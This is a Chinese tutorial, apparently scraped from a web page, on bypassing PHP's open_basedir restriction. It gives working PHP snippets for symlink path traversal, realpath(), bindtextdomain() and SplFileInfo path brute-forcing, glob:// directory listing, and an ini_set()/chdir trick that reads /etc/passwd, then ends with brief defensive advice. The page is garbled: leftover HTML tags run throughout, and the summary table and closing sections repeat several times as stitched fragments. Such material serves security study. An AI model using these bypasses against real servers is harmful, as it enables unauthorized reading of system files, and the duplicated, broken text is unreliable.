Open_basedir绕过技术详解<\/h1>

1. Open_basedir基础概念<\/h2>
Open_basedir是PHP的一个安全配置指令，用于限制PHP脚本可以访问的文件系统路径范围。<\/p>

关键特性：<\/h3>

限制所有文件操作到指定目录及其子目录<\/li>
不受安全模式(Safe Mode)影响<\/li>
设置的是路径前缀而非精确目录名<\/li>

示例：

open_basedir = \/dir\/user\/<\/code> 限制访问\/dir\/user\/<\/code>及其子目录<\/li>
<\/ul>
2. Open_basedir绕过技术<\/h2>
2.1 命令执行绕过<\/h3>
原理<\/strong>：Open_basedir仅限制PHP文件操作函数，不影响系统命令执行<\/p>
方法<\/strong>：<\/p>

使用system()<\/code>、exec()<\/code>、passthru()<\/code>等函数执行系统命令<\/li>
绕过disable_functions<\/code>限制时可尝试不同函数或编码技术<\/li>
<\/ul>
优势<\/strong>：直接有效，不受Open_basedir限制<\/p>
2.2 symlink()符号链接攻击<\/h3>
原理<\/strong>：利用符号链接和相对路径跳转突破目录限制<\/p>
步骤<\/strong>：<\/p>

创建多层目录结构<\/li>
创建符号链接指向目标路径<\/li>
删除并重建符号链接为目录<\/li>
通过多级..\/<\/code>跳转访问受限文件<\/li>
<\/ol>
示例代码<\/strong>：<\/p>
mkdir<\/span>("A"<\/span>);
<\/span><\/span>chdir<\/span>("A"<\/span>);
<\/span><\/span>mkdir<\/span>("B"<\/span>);
<\/span><\/span>chdir<\/span>("B"<\/span>);
<\/span><\/span>mkdir<\/span>("C"<\/span>);
<\/span><\/span>chdir<\/span>("C"<\/span>);
<\/span><\/span>mkdir<\/span>("D"<\/span>);
<\/span><\/span>chdir<\/span>("D"<\/span>);
<\/span><\/span>chdir<\/span>(".."<\/span>);
<\/span><\/span>chdir<\/span>(".."<\/span>);
<\/span><\/span>chdir<\/span>(".."<\/span>);
<\/span><\/span>chdir<\/span>(".."<\/span>);
<\/span><\/span>symlink<\/span>("A\/B\/C\/D"<\/span>, "aaa"<\/span>);
<\/span><\/span>symlink<\/span>("aaa\/etc\/passwd"<\/span>, "abc"<\/span>);
<\/span><\/span>unlink<\/span>("aaa"<\/span>);
<\/span><\/span>mkdir<\/span>("aaa"<\/span>);
<\/span><\/span><\/code><\/pre>注意<\/strong>：需要计算目标文件需要跨越的路径层级<\/p>
2.3 realpath()暴力破解<\/h3>
原理<\/strong>：利用realpath()对不存在路径和越界路径的不同响应<\/p>
特征<\/strong>：<\/p>

路径不存在：返回false<\/li>
路径越界：抛出错误"File is not within the allowed path(s)"<\/li>
<\/ul>
Windows环境利用<\/strong>：<\/p>

使用通配符爆破目录和文件名<\/li>
通过错误处理函数捕获越界响应<\/li>
<\/ul>
示例代码<\/strong>：<\/p>
ini_set<\/span>('open_basedir'<\/span>, dirname<\/span>(__FILE__<\/span>));
<\/span><\/span>set_error_handler<\/span>('isexists'<\/span>);
<\/span><\/span>$dir =<\/span> 'd:\/WEB\/'<\/span>;
<\/span><\/span>$file =<\/span> ''<\/span>;
<\/span><\/span>$chars =<\/span> 'abcdefghijklmnopqrstuvwxyz0123456789_'<\/span>;
<\/span><\/span>for<\/span> ($i =<\/span> 0<\/span>; $i <<\/span> strlen<\/span>($chars); $i++<\/span>) {
<\/span><\/span>    $file =<\/span> $dir .<\/span> $chars[$i] .<\/span> '<><'<\/span>;
<\/span><\/span>    realpath<\/span>($file);
<\/span><\/span>}
<\/span><\/span>function<\/span> isexists<\/span>($errno, $errstr) {
<\/span><\/span>    $regexp =<\/span> '\/File\is not within\/'<\/span>;
<\/span><\/span>    preg_match<\/span>($regexp, $errstr, $matches);
<\/span><\/span>    if<\/span> (isset<\/span>($matches[1<\/span>])) {
<\/span><\/span>        printf<\/span>("%s <br\/>"<\/span>, $matches[1<\/span>]);
<\/span><\/span>    }
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>2.4 bindtextdomain()和SplFileInfo::getRealPath()<\/h3>
bindtextdomain()特性<\/strong>：<\/p>

Linux特有函数<\/li>
存在路径时返回路径值，不存在返回false<\/li>
可用于路径探测<\/li>
<\/ul>
SplFileInfo::getRealPath()特性<\/strong>：<\/p>

获取文件绝对路径<\/li>
基于报错判断路径存在性<\/li>
<\/ul>
示例代码<\/strong>：<\/p>
ini_set<\/span>('open_basedir'<\/span>, dirname<\/span>(__FILE__<\/span>));
<\/span><\/span>$basedir =<\/span> 'D:\/test\/'<\/span>;
<\/span><\/span>$arr =<\/span> array<\/span>();
<\/span><\/span>$chars =<\/span> 'abcdefghijklmnopqrstuvwxyz0123456789'<\/span>;
<\/span><\/span>for<\/span> ($i =<\/span> 0<\/span>; $i <<\/span> strlen<\/span>($chars); $i++<\/span>) {
<\/span><\/span>    $info =<\/span> new<\/span> SplFileInfo<\/span>($basedir .<\/span> $chars[$i] .<\/span> '<><'<\/span>);
<\/span><\/span>    $re =<\/span> $info-><\/span>getRealPath<\/span>();
<\/span><\/span>    if<\/span> ($re) {
<\/span><\/span>        dump<\/span>($re);
<\/span><\/span>    }
<\/span><\/span>}
<\/span><\/span>function<\/span> dump<\/span>($s){
<\/span><\/span>    echo<\/span> $s .<\/span> '<br\/>'<\/span>;
<\/span><\/span>    ob_flush<\/span>();
<\/span><\/span>    flush<\/span>();
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>2.5 glob:\/\/伪协议利用<\/h3>
原理<\/strong>：PHP实现glob伪协议时不检测open_basedir<\/p>
限制<\/strong>：只能列出文件名，无法读取内容<\/p>
2.5.1 DirectoryIterator+glob:\/\/<\/h4>
方法<\/strong>：<\/p>
$a =<\/span> $_GET['a'<\/span>];
<\/span><\/span>$b =<\/span> new<\/span> DirectoryIterator<\/span>($a);
<\/span><\/span>foreach<\/span>($b as<\/span> $c){
<\/span><\/span>    echo<\/span>($c-><\/span>__toString<\/span>().<\/span>'<br>'<\/span>);
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>2.5.2 opendir()+readdir()+glob:\/\/<\/h4>
方法<\/strong>：<\/p>
$a =<\/span> $_GET['c'<\/span>];
<\/span><\/span>if<\/span> ($b =<\/span> opendir<\/span>($a)) {
<\/span><\/span>    while<\/span> (($file =<\/span> readdir<\/span>($b)) !==<\/span> false<\/span>) {
<\/span><\/span>        echo<\/span> $file .<\/span> "<br>"<\/span>;
<\/span><\/span>    }
<\/span><\/span>    closedir<\/span>($b);
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>注意<\/strong>：这两种方法只能列出根目录和open_basedir指定目录下的文件<\/p>
2.6 ini_set()动态修改绕过<\/h3>
原理<\/strong>：利用相对路径和目录跳转逐步扩大open_basedir范围<\/p>
关键点<\/strong>：<\/p>

通过多次chdir()跳转到根目录<\/li>
每次跳转后open_basedir范围自动调整<\/li>
最终设置open_basedir为根目录<\/li>
<\/ol>
示例代码<\/strong>：<\/p>
mkdir<\/span>('Andy'<\/span>);
<\/span><\/span>chdir<\/span>('Andy'<\/span>);
<\/span><\/span>ini_set<\/span>('open_basedir'<\/span>, '..'<\/span>);
<\/span><\/span>chdir<\/span>('..'<\/span>);
<\/span><\/span>chdir<\/span>('..'<\/span>);
<\/span><\/span>chdir<\/span>('..'<\/span>);
<\/span><\/span>ini_set<\/span>('open_basedir'<\/span>, '\/'<\/span>);
<\/span><\/span>echo<\/span> file_get_contents<\/span>('\/etc\/passwd'<\/span>);
<\/span><\/span><\/code><\/pre>底层原理<\/strong>：<\/p>

php_check_open_basedir_ex()<\/code>校验新open_basedir是否比之前更严格<\/li>
利用相对路径和expand_filepath()<\/code>函数特性<\/li>
通过多次目录跳转使open_basedir范围逐步扩大<\/li>
<\/ul>
3. 技术总结<\/h2>



方法<\/th>
适用环境<\/th>
限制条件<\/th>
效果<\/th>
<\/tr>
<\/thead>


命令执行<\/td>
所有环境<\/td>
需有命令执行能力<\/td>
完全绕过<\/td>
<\/tr>

symlink()<\/td>
支持符号链接的系统<\/td>
需要写权限<\/td>
读取任意文件<\/td>
<\/tr>

realpath()爆破<\/td>
Windows<\/td>
耗时<\/td>
探测路径<\/td>
<\/tr>

bindtextdomain()<\/td>
Linux<\/td>
需爆破<\/td>
探测路径<\/td>
<\/tr>

glob:\/\/<\/td>
所有环境<\/td>
只能列目录<\/td>
信息收集<\/td>
<\/tr>

ini_set()<\/td>
所有环境<\/td>
需要多次跳转<\/td>
完全绕过<\/td>
<\/tr>
<\/tbody>
<\/table>
4. 防御建议<\/h2>

结合其他安全措施如chroot<\/li>
限制PHP函数使用(disable_functions)<\/li>
定期更新PHP版本<\/li>
监控异常文件操作<\/li>
使用最小权限原则配置open_basedir<\/li>
<\/ol>
5. 扩展思考<\/h2>

不同PHP版本间的实现差异<\/li>
结合文件权限的深度防御<\/li>
其他伪协议的潜在利用可能<\/li>
PHP底层代码的安全审计方法<\/li>
<\/ol>

方法<\/th>	适用环境<\/th>	限制条件<\/th>	效果<\/th> <\/tr> <\/thead>
命令执行<\/td>	所有环境<\/td>	需有命令执行能力<\/td>	完全绕过<\/td> <\/tr>
symlink()<\/td>	支持符号链接的系统<\/td>	需要写权限<\/td>	读取任意文件<\/td> <\/tr>
realpath()爆破<\/td>	Windows<\/td>	耗时<\/td>	探测路径<\/td> <\/tr>
bindtextdomain()<\/td>	Linux<\/td>	需爆破<\/td>	探测路径<\/td> <\/tr>
glob:\/\/<\/td>	所有环境<\/td>	只能列目录<\/td>	信息收集<\/td> <\/tr>
ini_set()<\/td>	所有环境<\/td>	需要多次跳转<\/td>	完全绕过<\/td> <\/tr> <\/tbody> <\/table> 4. 防御建议<\/h2> 结合其他安全措施如chroot<\/li> 限制PHP函数使用(disable_functions)<\/li> 定期更新PHP版本<\/li> 监控异常文件操作<\/li> 使用最小权限原则配置open_basedir<\/li> <\/ol> 5. 扩展思考<\/h2> 不同PHP版本间的实现差异<\/li> 结合文件权限的深度防御<\/li> 其他伪协议的潜在利用可能<\/li> PHP底层代码的安全审计方法<\/li> <\/ol>

Open_basedir绕过技术详解<\/h1>

1. Open_basedir基础概念<\/h2> Open_basedir是PHP的一个安全配置指令，用于限制PHP脚本可以访问的文件系统路径范围。<\/p>

2. Open_basedir绕过技术<\/h2>

2.5 glob:\/\/伪协议利用<\/h3> 原理<\/strong>：PHP实现glob伪协议时不检测open_basedir<\/p> 限制<\/strong>：只能列出文件名，无法读取内容<\/p>

5. 扩展思考<\/h2> 不同PHP版本间的实现差异<\/li> 结合文件权限的深度防御<\/li> 其他伪协议的潜在利用可能<\/li> PHP底层代码的安全审计方法<\/li> <\/ol>

1. Open_basedir基础概念<\/h2>
Open_basedir是PHP的一个安全配置指令，用于限制PHP脚本可以访问的文件系统路径范围。<\/p>

2.5 glob:\/\/伪协议利用<\/h3>
原理<\/strong>：PHP实现glob伪协议时不检测open_basedir<\/p>
限制<\/strong>：只能列出文件名，无法读取内容<\/p>

5. 扩展思考<\/h2>

不同PHP版本间的实现差异<\/li>
结合文件权限的深度防御<\/li>
其他伪协议的潜在利用可能<\/li>
PHP底层代码的安全审计方法<\/li> <\/ol>